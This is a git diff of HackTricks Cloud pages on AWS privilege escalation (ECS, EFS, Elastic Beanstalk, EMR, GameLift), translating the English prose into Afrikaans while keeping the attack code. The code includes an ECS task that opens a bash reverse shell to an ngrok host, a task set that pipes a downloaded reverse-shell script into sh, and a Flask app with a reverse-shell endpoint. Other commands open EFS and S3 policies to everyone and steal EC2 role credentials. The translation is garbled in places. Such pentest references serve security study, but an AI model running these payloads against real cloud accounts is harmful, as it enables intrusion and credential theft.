-                "containerPath": "/var/run/docker.sock",
-                "sourceVolume": "docker-socket"
-            }
-        ]
-    }
+{
+"name":"exfil_creds",
+"image":"python:latest",
+"entryPoint":["sh", "-c"],
+"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
+"mountPoints": [
+{
+"readOnly": false,
+"containerPath": "/var/run/docker.sock",
+"sourceVolume": "docker-socket"
+}
+]
+}
 ]' > /tmp/task.json
 
 printf '[
-    {
-        "name": "docker-socket",
-        "host": {
-            "sourcePath": "/var/run/docker.sock"
-        }
-    }
+{
+"name": "docker-socket",
+"host": {
+"sourcePath": "/var/run/docker.sock"
+}
+}
 ]' > /tmp/volumes.json
 
 
 aws ecs register-task-definition --family iam_exfiltration \
-    --cpu 256 --memory 512 \
-    --requires-compatibilities '["EC2"]' \
-    --container-definitions file:///tmp/task.json \
-    --volumes file:///tmp/volumes.json
+--cpu 256 --memory 512 \
+--requires-compatibilities '["EC2"]' \
+--container-definitions file:///tmp/task.json \
+--volumes file:///tmp/volumes.json
 
 
 aws ecs run-task --task-definition iam_exfiltration \
-    --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
-    --launch-type EC2
+--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
+--launch-type EC2
 
 # You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
 ```
-
 ### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
 
-An attacker with the **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (you need the describe permissions because it's necessary to run `aws ecs execute-command`).\
-However, in order to do that, the container instance need to be running the **ExecuteCommand agent** (which by default isn't).
+'n Aanvaller met die **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** kan **opdragte uitvoer** binne 'n lopende houer en die IAM-rol wat daaraan gekoppel is, uitbring (jy het die beskryf toestemmings nodig omdat dit nodig is om `aws ecs execute-command` te loop).\
+E however, om dit te doen, moet die houerinstansie die **ExecuteCommand-agent** draai (wat standaard nie is nie).
 
-Therefore, the attacker cloud try to:
-
-- **Try to run a command** in every running container
+Daarom kan die aanvaller probeer om:
 
+- **Probeer om 'n opdrag** in elke lopende houer uit te voer.
 ```bash
 # List enableExecuteCommand on each task
 for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
-   echo "Cluster $cluster"
-   for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
-      echo "  Task $task"
-      # If true, it's your lucky day
-      aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
-   done
+echo "Cluster $cluster"
+for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
+echo "  Task $task"
+# If true, it's your lucky day
+aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
+done
 done
 
 # Execute a shell in a container
 aws ecs execute-command --interactive \
-   --command "sh" \
-   --cluster "$CLUSTER_ARN" \
-   --task "$TASK_ARN"
+--command "sh" \
+--cluster "$CLUSTER_ARN" \
+--task "$TASK_ARN"
 ```
+- As hy **`ecs:RunTask`** het, voer 'n taak uit met `aws ecs run-task --enable-execute-command [...]`
+- As hy **`ecs:StartTask`** het, voer 'n taak uit met `aws ecs start-task --enable-execute-command [...]`
+- As hy **`ecs:CreateService`** het, skep 'n diens met `aws ecs create-service --enable-execute-command [...]`
+- As hy **`ecs:UpdateService`** het, werk 'n diens op met `aws ecs update-service --enable-execute-command [...]`
 
-- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]`
-- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]`
-- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]`
-- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]`
+Jy kan **voorbeelde van daardie opsies** in **vorige ECS privesc afdelings** vind.
 
-You can find **examples of those options** in **previous ECS privesc sections**.
-
-**Potential Impact:** Privesc to a different role attached to containers.
+**Potensiële Impak:** Privesc na 'n ander rol wat aan houers gekoppel is.
 
 ### `ssm:StartSession`
 
-Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**:
+Kyk in die **ssm privesc bladsy** hoe jy hierdie toestemming kan misbruik om **privesc na ECS**:
 
 {{#ref}}
 aws-ssm-privesc.md
@@ -198,7 +186,7 @@ aws-ssm-privesc.md
 
 ### `iam:PassRole`, `ec2:RunInstances`
 
-Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**:
+Kyk in die **ec2 privesc bladsy** hoe jy hierdie toestemmings kan misbruik om **privesc na ECS**:
 
 {{#ref}}
 aws-ec2-privesc.md
@@ -206,30 +194,29 @@ aws-ec2-privesc.md
 
 ### `?ecs:RegisterContainerInstance`
 
-TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker??
+TODO: Is dit moontlik om 'n instansie van 'n ander AWS-rekening te registreer sodat take onder masjiene wat deur die aanvaller beheer word, uitgevoer word??
 
 ### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`
 
 > [!NOTE]
-> TODO: Test this
-
-An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**.
+> TODO: Toets dit
 
+'n Aanvaller met die toestemmings `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, en `ecs:DescribeTaskSets` kan **'n kwaadwillige taakstel vir 'n bestaande ECS-diens skep en die primêre taakstel opdateer**. Dit stel die aanvaller in staat om **arbitraire kode binne die diens uit te voer**.
 ```bash
 bashCopy code# Register a task definition with a reverse shell
 echo '{
-  "family": "malicious-task",
-  "containerDefinitions": [
-    {
-      "name": "malicious-container",
-      "image": "alpine",
-      "command": [
-        "sh",
-        "-c",
-        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
-      ]
-    }
-  ]
+"family": "malicious-task",
+"containerDefinitions": [
+{
+"name": "malicious-container",
+"image": "alpine",
+"command": [
+"sh",
+"-c",
+"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
+]
+}
+]
 }' > malicious-task-definition.json
 
 aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json
@@ -240,15 +227,10 @@ aws ecs create-task-set --cluster existing-cluster --service existing-service --
 # Update the primary task set for the service
 aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
 ```
+**Potensiële Impak**: Voer arbitrêre kode uit in die betrokke diens, wat moontlik die funksionaliteit daarvan beïnvloed of sensitiewe data uitvlek.
 
-**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data.
-
-## References
+## Verwysings
 
 - [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md
index 8a54b28d8..185f503ff 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md
@@ -4,97 +4,83 @@
 
 ## EFS
 
-More **info about EFS** in:
+Meer **inligting oor EFS** in:
 
 {{#ref}}
 ../aws-services/aws-efs-enum.md
 {{#endref}}
 
-Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it.
+Onthou dat jy om 'n EFS te monteer, in 'n subnetwerk moet wees waar die EFS blootgestel is en toegang daartoe moet hê (veiligheidsgroepe). As dit gebeur, sal jy dit standaard altyd kan monteer, maar as dit deur IAM-beleide beskerm word, moet jy die ekstra toestemmings hê wat hier genoem word om toegang te verkry.
 
 ### `elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`
 
-With any of those permissions an attacker can **change the file system policy** to **give you access** to it, or to just **delete it** so the **default access** is granted.
-
-To delete the policy:
+Met enige van daardie toestemmings kan 'n aanvaller die **lêerstelselsbeleid** **verander** om jou **toegang** daartoe te gee, of om dit net te **verwyder** sodat die **standaardtoegang** toegestaan word.
 
+Om die beleid te verwyder:
 ```bash
 aws efs delete-file-system-policy \
-    --file-system-id <value>
+--file-system-id <value>
 ```
-
-To change it:
-
+Om dit te verander:
 ```json
 aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json
 
 // Give everyone trying to mount it read, write and root access
 // policy.json:
 {
-    "Version": "2012-10-17",
-    "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
-    "Statement": [
-        {
-            "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "*"
-            },
-            "Action": [
-	       "elasticfilesystem:ClientRootAccess",
-               "elasticfilesystem:ClientWrite",
-               "elasticfilesystem:ClientMount"
-            ],
-            "Condition": {
-                "Bool": {
-                    "elasticfilesystem:AccessedViaMountTarget": "true"
-                }
-            }
-        }
-    ]
+"Version": "2012-10-17",
+"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
+"Statement": [
+{
+"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"elasticfilesystem:ClientRootAccess",
+"elasticfilesystem:ClientWrite",
+"elasticfilesystem:ClientMount"
+],
+"Condition": {
+"Bool": {
+"elasticfilesystem:AccessedViaMountTarget": "true"
+}
+}
+}
+]
 }
 ```
-
 ### `elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`
 
-With this permission an attacker will be able to **mount the EFS**. If the write permission is not given by default to everyone that can mount the EFS, he will have only **read access**.
-
+Met hierdie toestemming sal 'n aanvaller in staat wees om die **EFS te monteer**. As die skryftoestemming nie standaard aan almal wat die EFS kan monteer gegee word nie, sal hy slegs **lees toegang** hê.
 ```bash
 sudo mkdir /efs
 sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/
 ```
+Die ekstra regte `elasticfilesystem:ClientRootAccess` en `elasticfilesystem:ClientWrite` kan gebruik word om **te skryf** binne die lêerstelsel nadat dit gemonteer is en om **toegang** tot daardie lêerstelsel **as root** te verkry.
 
-The extra permissions`elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` can be used to **write** inside the filesystem after it's mounted and to **access** that file system **as root**.
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die lêerstelsel te lokaliseer.
 
 ### `elasticfilesystem:CreateMountTarget`
 
-If you an attacker is inside a **subnetwork** where **no mount target** of the EFS exists. He could just **create one in his subnet** with this privilege:
-
+As jy 'n aanvaller is wat binne 'n **subnet** is waar **geen monteerdoel** van die EFS bestaan nie. Hy kan eenvoudig **een in sy subnet skep** met hierdie voorreg:
 ```bash
 # You need to indicate security groups that will grant the user access to port 2049
 aws efs create-mount-target --file-system-id <fs-id> \
-    --subnet-id <value> \
-    --security-groups <value>
+--subnet-id <value> \
+--security-groups <value>
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die lêerstelsel te lokaliseer.
 
 ### `elasticfilesystem:ModifyMountTargetSecurityGroups`
 
-In a scenario where an attacker finds that the EFS has mount target in his subnetwork but **no security group is allowing the traffic**, he could just **change that modifying the selected security groups**:
-
+In 'n scenario waar 'n aanvaller ontdek dat die EFS 'n mount target in sy subnetwerk het, maar **geen sekuriteitsgroep die verkeer toelaat nie**, kan hy eenvoudig **dit verander deur die geselekteerde sekuriteitsgroepe aan te pas**:
 ```bash
 aws efs modify-mount-target-security-groups \
-    --mount-target-id <value> \
-    --security-groups <value>
+--mount-target-id <value> \
+--security-groups <value>
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die lêerstelsel te lokaliseer.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
index 613dd3a47..1eefa948d 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
@@ -4,19 +4,18 @@
 
 ## Elastic Beanstalk
 
-More **info about Elastic Beanstalk** in:
+Meer **inligting oor Elastic Beanstalk** in:
 
 {{#ref}}
 ../aws-services/aws-elastic-beanstalk-enum.md
 {{#endref}}
 
 > [!WARNING]
-> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`**
+> Om sensitiewe aksies in Beanstalk uit te voer, sal jy **'n baie groot aantal sensitiewe toestemmings in 'n baie verskillende dienste** nodig hê. Jy kan byvoorbeeld die toestemmings nagaan wat gegee is aan **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`**
 
-### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others
-
-With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it.
+### `elasticbeanstalk:RebuildEnvironment`, S3 skryftoestemmings & baie ander
 
+Met **skryftoestemmings oor die S3-bucket** wat die **kode** van die omgewing bevat en toestemmings om die toepassing te **herbou** (dit is nodig `elasticbeanstalk:RebuildEnvironment` en 'n paar meer wat verband hou met `S3`, `EC2` en `Cloudformation`), kan jy die **kode** **wysig**, die app **herbou** en die volgende keer wanneer jy toegang tot die app kry, sal dit **jou nuwe kode uitvoer**, wat die aanvaller in staat stel om die toepassing en die IAM-rol geloofsbriewe daarvan te kompromitteer.
 ```bash
 # Create folder
 mkdir elasticbeanstalk-eu-west-1-947247140022
@@ -31,56 +30,42 @@ aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247
 # Rebuild env
 aws elasticbeanstalk rebuild-environment --environment-name "env-name"
 ```
+### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, en meer...
 
-### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more...
-
-The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch.
-
-- Create an AWS Elastic Beanstalk application:
+Die genoemde plus verskeie **`S3`**, **`EC2`, `cloudformation`**, **`autoscaling`** en **`elasticloadbalancing`** toestemmings is nodig om 'n rou Elastic Beanstalk-scenario van nuuts af te skep.
 
+- Skep 'n AWS Elastic Beanstalk-toepassing:
 ```bash
 aws elasticbeanstalk create-application --application-name MyApp
 ```
-
-- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)):
-
+- Skep 'n AWS Elastic Beanstalk omgewing ([**ondersteunde platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)):
 ```bash
 aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
 ```
+As 'n omgewing reeds geskep is en jy **nie 'n nuwe een wil skep nie**, kan jy eenvoudig die bestaande een **opdateer**.
 
-If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one.
-
-- Package your application code and dependencies into a ZIP file:
-
+- Pakket jou toepassingskode en afhanklikhede in 'n ZIP-lêer:
 ```python
 zip -r MyApp.zip .
 ```
-
-- Upload the ZIP file to an S3 bucket:
-
+- Laai die ZIP-lêer na 'n S3-bucket op:
 ```python
 aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
 ```
-
-- Create an AWS Elastic Beanstalk application version:
-
+- Skep 'n AWS Elastic Beanstalk-toepassing weergawe:
 ```css
 aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
 ```
-
-- Deploy the application version to your AWS Elastic Beanstalk environment:
-
+- Ontplooi die toepassingsweergawe na jou AWS Elastic Beanstalk-omgewing:
 ```bash
 aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
 ```
-
 ### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses`
 
-First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. Potentially a simple **zip** containing these **2 files**:
+Eerstens moet jy 'n **legitieme Beanstalk-omgewing** skep met die **kode** wat jy in die **slagoffer** wil uitvoer volgens die **vorige stappe**. Potensieel 'n eenvoudige **zip** wat hierdie **2 lêers** bevat:
 
 {{#tabs }}
 {{#tab name="application.py" }}
-
 ```python
 from flask import Flask, request, jsonify
 import subprocess,os, socket
@@ -89,34 +74,32 @@ application = Flask(__name__)
 
 @application.errorhandler(404)
 def page_not_found(e):
-        return jsonify('404')
+return jsonify('404')
 
 @application.route("/")
 def index():
-        return jsonify('Welcome!')
+return jsonify('Welcome!')
 
 
 @application.route("/get_shell")
 def search():
-        host=request.args.get('host')
-        port=request.args.get('port')
-        if host and port:
-            s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-            s.connect((host,int(port)))
-            os.dup2(s.fileno(),0)
-            os.dup2(s.fileno(),1)
-            os.dup2(s.fileno(),2)
-            p=subprocess.call(["/bin/sh","-i"])
-        return jsonify('done')
+host=request.args.get('host')
+port=request.args.get('port')
+if host and port:
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((host,int(port)))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+p=subprocess.call(["/bin/sh","-i"])
+return jsonify('done')
 
 if __name__=="__main__":
-    application.run()
+application.run()
 ```
-
 {{#endtab }}
 
 {{#tab name="requirements.txt" }}
-
 ```
 click==7.1.2
 Flask==1.1.2
@@ -125,44 +108,42 @@ Jinja2==2.11.3
 MarkupSafe==1.1.1
 Werkzeug==1.0.1
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**):
-
+Sodra jy **jou eie Beanstalk omgewing** met jou rev shell aan die gang het, is dit tyd om dit te **migreer** na die **slagoffer** se omgewing. Om dit te doen, moet jy die **Bucket-beleid** van jou beanstalk S3-bucket **opdateer** sodat die **slagoffer toegang kan hê** (Let daarop dat dit die Bucket vir **ELKEEN** sal **oopmaak**):
 ```json
 {
-  "Version": "2008-10-17",
-  "Statement": [
-    {
-      "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": [
-        "s3:ListBucket",
-        "s3:ListBucketVersions",
-        "s3:GetObject",
-        "s3:GetObjectVersion",
-        "s3:*"
-      ],
-      "Resource": [
-        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
-        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
-      ]
-    },
-    {
-      "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
-      "Effect": "Deny",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "s3:DeleteBucket",
-      "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
-    }
-  ]
+"Version": "2008-10-17",
+"Statement": [
+{
+"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"s3:ListBucket",
+"s3:ListBucketVersions",
+"s3:GetObject",
+"s3:GetObjectVersion",
+"s3:*"
+],
+"Resource": [
+"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
+"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
+]
+},
+{
+"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
+"Effect": "Deny",
+"Principal": {
+"AWS": "*"
+},
+"Action": "s3:DeleteBucket",
+"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
+}
+]
 }
 ```
 
@@ -181,9 +162,4 @@ Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBe
 
 The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
index 0025abe52..bd917174b 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
@@ -4,7 +4,7 @@
 
 ## EMR
 
-More **info about EMR** in:
+Meer **inligting oor EMR** in:
 
 {{#ref}}
 ../aws-services/aws-emr-enum.md
@@ -12,57 +12,51 @@ More **info about EMR** in:
 
 ### `iam:PassRole`, `elasticmapreduce:RunJobFlow`
 
-An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\
-Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`).
-
+'n Aanvaller met hierdie toestemmings kan **'n nuwe EMR-kluster uitvoer wat EC2-rolle aanheg** en probeer om sy akrediteer te steel.\
+Let daarop dat jy om dit te doen, **'n ssh priv sleutel wat in die rekening ingevoer is, moet ken** of een moet invoer, en in staat moet wees om **poort 22 in die meesterknoop te open** (jy mag in staat wees om dit te doen met die eienskappe `EmrManagedMasterSecurityGroup` en/of `ServiceAccessSecurityGroup` binne `--ec2-attributes`).
 ```bash
 # Import EC2 ssh key (you will need extra permissions for this)
 ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
 chmod 400 /tmp/sshkey
 base64 /tmp/sshkey.pub > /tmp/pub.key
 aws ec2 import-key-pair \
-    --key-name "privesc" \
-    --public-key-material file:///tmp/pub.key
+--key-name "privesc" \
+--public-key-material file:///tmp/pub.key
 
 
 aws emr create-cluster \
-    --release-label emr-5.15.0 \
-    --instance-type m4.large \
-    --instance-count 1 \
-    --service-role EMR_DefaultRole \
-    --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
+--release-label emr-5.15.0 \
+--instance-type m4.large \
+--instance-count 1 \
+--service-role EMR_DefaultRole \
+--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
 
 # Wait 1min and connect via ssh to an EC2 instance of the cluster)
 aws emr describe-cluster --cluster-id <id>
 # In MasterPublicDnsName you can find the DNS to connect to the master instance
 ## You cna also get this info listing EC2 instances
 ```
+Let op hoe 'n **EMR rol** gespesifiseer word in `--service-role` en 'n **ec2 rol** gespesifiseer word in `--ec2-attributes` binne `InstanceProfile`. Hierdie tegniek laat egter net toe om die EC2 rol geloofsbriewe te steel (soos jy via ssh sal aansluit) maar nie die EMR IAM Rol nie.
 
-Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.
-
-**Potential Impact:** Privesc to the EC2 service role specified.
+**Potensiële Impak:** Privesc na die EC2 diensrol gespesifiseer.
 
 ### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`
 
-With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role.
+Met hierdie toestemmings kan 'n aanvaller na die **AWS konsole** gaan, 'n Notebook skep en dit toegang om die IAM Rol te steel.
 
 > [!CAUTION]
-> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related.
+> Selfs as jy 'n IAM rol aan die notaboekinstansie heg, het ek in my toetse opgemerk dat ek in staat was om AWS bestuurde geloofsbriewe te steel en nie geloofsbriewe wat met die IAM rol verband hou nie.
 
-**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
+**Potensiële Impak:** Privesc na AWS bestuurde rol arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
 
 ### `elasticmapreduce:OpenEditorInConsole`
 
-Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\
-The URL of the notebook is `https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/`
+Net met hierdie toestemming sal 'n aanvaller in staat wees om toegang te verkry tot die **Jupyter Notebook en die IAM rol** wat daaraan gekoppel is.\
+Die URL van die notaboek is `https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/`
 
 > [!CAUTION]
-> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related
+> Selfs as jy 'n IAM rol aan die notaboekinstansie heg, het ek in my toetse opgemerk dat ek in staat was om AWS bestuurde geloofsbriewe te steel en nie geloofsbriewe wat met die IAM rol verband hou nie.
 
-**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
+**Potensiële Impak:** Privesc na AWS bestuurde rol arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
index b40cdf413..0501ebde3 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
@@ -4,19 +4,13 @@
 
 ### `gamelift:RequestUploadCredentials`
 
-With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**.
-
+Met hierdie toestemming kan 'n aanvaller 'n **nuwe stel van geloofsbriewe verkry vir gebruik wanneer hulle** 'n nuwe stel speletjie bou lêers na Amazon GameLift se Amazon S3 oplaai. Dit sal **S3 oplaai geloofsbriewe** teruggee.
 ```bash
 aws gamelift request-upload-credentials \
-    --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111
+--build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111
 ```
-
-## References
+## Verwysings
 
 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md
index 049d3b273..2f7c89ee5 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md
@@ -6,15 +6,14 @@
 
 ### `iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)
 
